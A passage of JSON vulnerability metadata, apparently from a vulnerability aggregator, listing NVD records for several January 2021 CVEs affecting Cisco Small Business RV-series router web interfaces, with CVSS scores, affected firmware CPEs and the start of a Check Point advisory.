["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1180", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1180", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:58", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1307", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1307"], "modified": "2021-01-20T16:17:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.0.3.55", "cpe:/o:cisco:rv110w_firmware:1.0.3.55", "cpe:/o:cisco:rv215w_firmware:1.0.3.55", "cpe:/o:cisco:rv130_firmware:1.0.3.55"], "id": "CVE-2021-1307", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1307", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv215w_firmware:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.55:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:21", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1168", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1168"], "modified": "2021-01-19T19:22:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1168", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1168", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:34", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1179", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1179"], "modified": "2021-01-19T19:14:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1179", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1179", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:02", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1199", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1199"], "modified": "2021-01-15T19:47:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1199", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:37", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1181", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1181"], "modified": "2021-01-19T19:08:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1181", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1181", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:26", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1172", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1172"], "modified": "2021-01-19T19:19:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1172", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1172", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:59", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1196", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1196"], "modified": "2021-01-15T19:48:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1196", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1196", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:08", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1205", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1205"], "modified": "2021-01-19T19:00:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv130_firmware:1.2.2.8", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/o:cisco:rv215w_firmware:1.2.2.8"], "id": "CVE-2021-1205", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1205", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:41", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1182", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1182"], "modified": "2021-01-19T19:08:00", "cpe": ["cpe:/o:cisco:rv130_firmware:1.0.3.44", "cpe:/o:cisco:rv130w_firmware:1.0.3.44", "cpe:/o:cisco:rv110w_firmware:1.0.3.44", "cpe:/o:cisco:rv215w_firmware:1.0.3.44"], "id": "CVE-2021-1182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1182", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv110w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_firmware:1.0.3.44:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_firmware:1.0.3.44:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:02", "description": "A denial of service vulnerability exists in Cisco Small Business routers. Successful exploitation of this vulnerability would allow a remote attacker to create a denial of service condition on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Small Business Routers Denial Of Service (CVE-2021-1167)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": 